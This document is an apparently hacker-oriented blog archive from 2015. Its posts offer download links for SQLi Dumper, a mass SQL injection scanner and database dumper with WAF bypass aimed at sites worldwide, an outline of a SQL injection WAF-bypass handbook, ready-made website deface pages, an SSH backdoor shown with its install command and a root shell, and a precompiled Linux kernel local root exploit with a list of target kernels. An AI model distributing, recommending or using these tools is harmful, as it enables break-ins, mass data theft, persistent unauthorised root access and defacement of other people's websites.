Pages

Friday, May 22, 2015

PHP Security Training Video


Topics Of the Course !!!

what is the threat ? 
  • How can you Analyze the threat ?
  • what Types of threats Are out there?
  • How bad is it ?
  • what Threats Are Specific to PHP?
  • what are some resources to find out more ??


what are the Consequences when a website is not protected Against Attack?
  • Financial loss
  • Loss of Service
  • identity Theft
  • website infection


what are most common forms of aTTack?


  • Cross site Scripting(xss)
  • Remote Code injection 
  • session hijacking, fixaion, and request forgery Sql injection

what Are the  Most  Common  Vulnerabilities aTTackers can Exploit?


  • unplanned information disclosure
  • predictable resource location
  • insufficient authorization
  • improper accesss controls
  • PHP misconfiguration
  • Mishandling file uploads

Download: Medaiafire

Wednesday, May 20, 2015

SQLi Dumper - Advanced SQL Injection\Scanner Tool v7.0 Private Version

 
Designed to be automated to find and exploit web security vulnerabilities in mass from worldwide!
It is robust, works in the background threads and is super faster.
Uses an advanced search engine with 10 different online search services.

Last release: 06/23/2014 v.7.0

SQLi Dumper Features:

-Suports 20 methods of SQL Injection;
-Suports Multi. Online search engine (to find the trajects);
-Automated search for data in a bulk URL list;
-Automated analizer and dumper with custom injections points (URL, POST, Cookies, UserLogin or UserPassword);
-Dumper suports dumping data with multi-threading (databases/tables/columns/fetching data);
-Exploiter, Analizer and Dumper suports up to 50x separeted threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with greats control of delay each request;
-Easy switch vulnerabilities to vulnerabilities (internal database);
-Suports proxies list;
-GeoIP database;
-Advanced Trash System works with millions of urls;
-Admin login finder;
-Standalone .exe (no install).
 
 
Download: Sqli Dumper
 

Wednesday, May 6, 2015

SQL Injection Bypassing handbook


Content writers :-

Chapter I:::


  • SQL Injection: What is it?
  • SQL Injection: An In-depth Explanation
  • Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism?
  • Is my database at risk to SQL Injection?
  • What is the impact of SQL Injection?
  • Example of a SQLInjection Attack

WebApplication Firewalls::


  • Detecting A WAF
  • Prompt Message
  • Dotdefender
  • Observing HTTP Response

Chapter II

Advanced evasion techniques for defeating SQL injection Input validation mechanisms
Web applications are becoming more and more technically complex. Web applications, their

  • Whitespace
  • Null Bytes
  • SQL Comments
  • URL Encoding
  • Changing Cases
  • Encode to Hex Forbidden
  • Replacing keywords technique
  • WAF Bypassing – using characters
  • HTTP Parameter Pollution (HPP)
  • CRLF WAF Bypass technique
  • Buffer Overflow bypassing
Chapter III

Let's see the matter in an orderly fashion from the beginning
  • See If Site vulnerability Or Not
  • Get Column Number
  • Bypassing union select
  • Get Version
  • Group & Concat
  • Bypass with Information_schema.tables
  • Requested Baypassing
Chapter IV

Other issues related to the subject
  • Null Parameter
  • FIND VULNERABLE COLUMNS
  • Count(*)
  • unhex()
  • Get database
Download : MediaFire

source: HF

Sunday, May 3, 2015

Best Deface pages Collection

Don't Have Time for designing A Deface page .. ?? 
dont worry here you can download Best Deface Pages, 
Just replace the Name and messgae with your own name and message !!
[Click on Download And Copy The Code, Then Use it, for demo you can paste the code on Pastehtml.com

How to edit and save it... ??
All html codes are shared on pastebin, copy it and paste in notepad
then edit it and save as index.html or anyname.html


1- Tiger M@te's Deface Page, 
This Deface page was uploaded on google bangladesh'd domain Google.com.bd
 : Download


2- Happy Birhthday Deface Page 
for making someone's Birthday special =)
 : Download

3- Deface Page For Long Messages + Video 
Designed By Ffessxt Prince indishell
: Download 


4- #opFreedom Plestine, 
Deface page with free palestine message, Designed by The Hackers army
 : Download


5- Lovely deface Page for Your Girlfried or loved one 
This Deface Page was designed by me =)
 : Download


6-Deface Page with dancing firefox script
 : Download


7-Multi colour deface page
 : Download  


8- Simple Black Deface Page 
Designed by Hax root
 : Download


9-Matrix Style Deface Page
Designed by ShOrTy420
 : Download


10-Pro Style Deface Page 
 : Download


9- Awesome  #opFreedom Plestine Page with New Fuctions
this page desgned by Syakila Daniel
 : Download


10- Awesme Matrix style Deface Page 
Designed by coded32 
: Download


11- Romantic deface Page with Roses
designed by Deepak  Carpenter
: Download


12- Deface Page with Jquery 
Designed by Privatex
 : Download


13- #opmegaupload Deface Page
 : Download

14- A Progammer's Deface Page with Love Letter
Designed by Me .. =)
 : Download

Thursday, April 2, 2015

sshDoor (good ssh backdoor)



Usage:
./install passwrod port
./install jancok 33

 
open putty
ssh port : 33 login : root password : jancok

[root@serv ~]# uname -a;id
Linux serv.test.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 20010 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@serv ~]# 

Download:  Here

Local Root Exploit For Linux Kernel 2.6.32 (precompile)



Note: 
Its a pre-compiled exploit and has been verified for list servers. It might working on other 2.6.32-X kernels too. So, test it and update us in comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.

Vulnerable Kernels:

Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64
Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64
Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64
Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64
Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64
Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64
Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64
Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64
Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64
Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64
Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64
Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64
Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64
Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64
Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64
Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64
Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64
Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64
Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64
Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64
Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64
Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64
Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux 
 Download here
Zip Password: *pakmadhunters* 
credit to  owner :)